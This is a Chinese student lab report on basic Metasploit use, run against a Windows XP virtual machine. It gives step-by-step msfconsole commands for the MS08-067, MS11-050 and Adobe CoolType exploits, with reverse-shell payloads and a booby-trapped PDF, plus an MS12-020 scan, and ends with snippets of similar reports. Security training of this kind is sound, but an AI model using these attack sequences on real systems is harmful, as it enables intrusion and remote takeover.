2018-2019~6 20165107 网络对抗技术 Exp5 MSF基础应用

20165107 网络对抗技术 Exp5 MSF基础应用

1.实验内容

1.1一个主动攻击实践,如ms08_067(成功)

1.2 一个针对浏览器的攻击,如ms11_050(成功)

1.3 一个针对客户端的攻击,如Adobe(成功)

1.4 成功应用任何一个辅助模块,如scanner/rdp/ms12_020_check(唯一,成功)

2.基础问题回答:用自己的话解释什么是exploit,payload,encode.

  • exploit相当于是载具,是渗透攻击模块,将负责攻击的代码传送到靶机中。
  • payload相当于载荷,是我们exploit中shellcode中的主要功能代码,负责执行攻击。
  • Encode用于对payload进行编码,通过修改字符,实现免杀,不让杀软轻易的发现payload是攻击代码。

3.实验过程

任务一:一个主动攻击实践——漏洞MS08_067

  • 关于漏洞MS08_067的原理

安全公告:KB958644   时间:2008年底

原理:攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC请求,通过MSRPC接口调用serve服务函数NetPathCanonicalize函数对进行远程访问的路径规范化,而此函数中存在栈缓冲区内存漏洞,可被利用实施远程代码执行

详细原理说明:在规范化路径操作中,就是将路径字符串中‘/‘置换成‘‘以及出去相对路径(例如:‘.‘),而服务程序在这部分的地址空间检查存在逻辑漏洞,攻击者可以在函数除去“..”字符串时,将路径字符串中的内容复制到路径串之前的地址空间中,覆盖掉返回地址执行shellcode(原理类似我们之前所做的缓冲区溢出攻击)

受影响的操作系统:windows 2000/xp/server 2003/server 2008/vista/7 Beta

  • 攻击过程

靶机:Windows XP SP3 English   IP:192.168.150.135

主机:Kali                                      IP:192.168.150.132

  • 实验步骤

先用search ms08_067指令查询一下针对该漏洞可以运用的攻击模块.

再用use exploit/windows/smb/ms08_067_netapi使用该模块,再使用show payloads查看可以供我们使用的payload.

我们的目的是为了获取靶机的shell,因此这里我们选择通过反向连接来获取shell的generic/shell_reverse_tcp当payload,使用指令set payload generic/shell_reverse_tcp对payload进行设置。再使用指令show options查看我们需要设置的参数,发现需要设置一个RHOST(远程主机,即靶机的IP地址)和一个LHOST(本地主机,即攻击机的IP地址).

接着使用exploit指令开始攻击,攻击成功后获取了靶机的shell,使用dir指令查看目录文件.

任务二:一个针对浏览器的攻击,如ms11_050.

  • 关于漏洞的原理

原理:IE浏览器MSHTML模块在处理无效标签时存在use-after-free漏洞

影响范围:IE Exploer 7 以及 IE Exploer 8

  • 攻击过程

靶机:Windows XP SP3 English  IP:192.168.150.135

主机:Kali                                     IP:192.168.150.132

  • 实验步骤

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

msf > use windows/browser/ms11_050_mshtml_cobjectelement//使用浏览器ms11_050漏洞

msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连

msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.150.132//攻击机ip

msf exploit(ms11_050_cobjectelement) > set LPORT 5107//攻击端口固定

msf exploit(ms11_050_cobjectelement) > set URIPATH 5107ky //统一资源标识符路径设置

msf exploit(ms11_050_cobjectelement) > exploit.

在访问http://192.168.150.132:8080/5107ky时,可见攻击机出现访问信息.

kali连接成功!

任务三:一个针对客户端的攻击Adobe_cooltype_sing.

  • 漏洞原理及攻击机型

这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出。

攻击机:kali   IP:192.168.150.136   靶机:windows XP sp3   IP:192.168.150.135    Adobe:9.3

  • 实验步骤

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

msf > use windows/fileformat/adobe_cooltype_sing

msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp` //tcp反向回连

msf exploit(adobe_cooltype_sing) > set LHOST 192.168.150.136 //攻击机ip

msf exploit(adobe_cooltype_sing) > set LPORT 5107 //攻击端口

msf exploit(adobe_cooltype_sing) > set FILENAME 5107.pdf //设置生成pdf文件的名字

msf exploit(adobe_cooltype_sing) > exploit //攻击

可成功生成5107.pdf

将pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:

msf > use exploit/multi/handler //进入监听模块

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接

msf exploit(handler) > set LHOST 192.168.150.136 //攻击机ip

msf exploit(handler) > set LPORT 5107 //攻击端口固定

msf exploit(handler) > exploit

然后在靶机上打开5107.pdf文件

kali连接成功!

任务四:成功应用任何一个辅助模块——rdp/ms12_020check.

首先打开辅助模块

找到测试需要的模块:auxiliary/scanner/rdp/ms12_020_check,它的作用是扫描验证目标机是否具有此漏洞,具体步骤如下所示.

经过exploit运行后显示关于漏洞是否可利用是不可靠的

4.思考题:离实战还缺些什么技术或步骤

本次实验对靶机的版本、对补丁的要求很多,系统均用的是较老的版本,对于现实的攻击情况已经不大适用,要想研究最新的msf攻击技术,就要继续深入学习,掌握更多msf工具,并不断提升自己的代码编程能力。

5.实验感想

本次实验我对MSF工具进行了基础运用,体会到了msf工具的功能强大,在实验过程中,寻找合适版本的的虚拟机并安装用时较长,在寻找工具过程中,体会到学会查找工具的用途也很重要,如show targets、show payloads等命令。实验过程很有趣,攻击成功有小小的成就感,本次msf基础实验也是为后续实验打基础,接下来还需继续深入学习研究。

原文地址:https://www.cnblogs.com/3523108059lyl/p/10720653.html

时间: 2024-08-27 16:23:30

2018-2019~6 20165107 网络对抗技术 Exp5 MSF基础应用的相关文章

20155232《网络对抗》Exp5 MSF基础应用

20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击,相当于一个载具 payload:就是攻击的代码,是载荷. encode:为了帮助攻击载荷避免被杀软发现,进行伪装. 实践总结与体会 在辅助模块这里,可以发现很多旧版本的软件有漏洞,从而可以进行相关的攻击,在此次实验中就体验了旧版本有漏洞的一些软件进行了攻击并且很轻易就实现了,所以有漏洞时,一定要尽快打补丁,

20145311王亦徐 《网络对抗技术》 MSF基础应用

20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms08_067渗透为例 针对浏览器的攻击,以漏洞10_046为例 针对客户端的攻击,对具体应用的攻击,以对Adobe阅读器的漏洞攻击为例 最后是一个auxiliary模块的例子的应用 基础问题回答 1.解释exploit,payload,encode是什么 exploit是渗透攻击模块,利用系统服务应用中的漏洞

20145321 《网络对抗技术》 MSF基础应用

20145321 <网络对抗技术> MSF基础应用 MS08_067漏洞渗透攻击 先查看kali和windows的IP地址 进入msfconsole,选择使用ms08_067的exploit,再选择具体要负载使用的payload,设置载荷,主机ip,靶机ip 输入exploit命令即可攻击客户端.获取shell.可查看靶机IP

《网络对抗》Exp5 MSF基础应用

20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:漏洞利用,与靶机进行交互,攻击靶机的最后一步 payload:有效载荷,后面一般加要对靶机进行攻击的代码,可以实现任何运行在受害者环境中的程序所能做的事情 encode:编码器,对代码进行异或运算.去除坏字符等等,保护payload不被发现 二.实践过程 1.Windows服务渗透攻击--MS08-067安全漏洞 ①攻击机:kali ②靶机:

20155330 《网络对抗》 Exp5 MSF基础应用

20155330 <网络对抗> Exp5 MSF基础应用 实践过程记录 Windows服务渗透:MS08_067漏洞攻击 攻击机:kali IP地址:192.168.124.132 靶机:windows XP SP3 简体中文 IP地址:192.168.124.135 输入命令use exploit/windows/smb/ms08_067_netapi 设置参数 set payload generic/shell_reverse_tcptcp反向回连 set LHOST 192.168.23

20155333 《网络对抗》 Exp5 MSF基础应用

20155333 <网络对抗> Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:攻击手段,是能使攻击武器(payload)的方法: payload:攻击武器,真正具有攻击性的代码: encode:编码方式,根据payload将要被放置的环境选择合适的编码方式,使它能够正常的运行. 实践 一个主动攻击实践,如ms08_067 ①攻击机:kali ②靶机:windows XP SP3(English) 在攻击机kali输入m

20155331《网络对抗》Exp5 MSF基础应用

20155331<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode 答:exploit就是漏洞利用.exploit就是利用一切可以利用的工具.采用一切可以采用的方法.找到一切可以找到的漏洞,并且通过对漏洞资料的分析研究,从而达到获取网站用户资料文档.添加自定义用户.甚至侵入网站获得管理员权限控制整个网站的最终目的. payload是攻击载荷,exploit把它传送到靶机中后,它就负责执行相应的攻击代码. encode是编码,实现

20145235李涛《网络对抗》Exp5 MSF基础应用

基础问答 用自己的话解释什么是exploit,payload,encode? exploit:相当于搬运工,把攻击代码传送到靶机中. payload:相当于shellcode. encode:相当于包装者,对攻击代码进行编码. adobe_toolbutton漏洞工具 首先生成后门程序 传到到靶机 设置监听,在靶机上打开后门程序,发现攻击成功,查看靶机的信息 ms08_067漏洞攻击 这个攻击需要设置攻击机和靶机的ip地址,然后直接开始攻击 攻击成功,可以查看到靶机的系统信息 ms10_046漏

20155326刘美岑《网络对抗》Exp5 MSF基础应用

基础问题回答 解释exploit,payload,encode是什么: exploit:就是一个简单的攻击指令,在配置完成之后下发攻击命令. payload:是攻击载荷,是我们在攻击过程中真正用到的部分,进行攻击的实体. encode:是重新进行编码,伪装此次攻击,躲过查杀. 实验过程记录 主动攻击实践:ms06_040 首先,在实验前,检查两个虚拟机能否互相ping通 在kali中打开msf 我首先尝试使用ms06_040进行主动攻击 之后,用show targets查看该漏洞可以攻击的系统版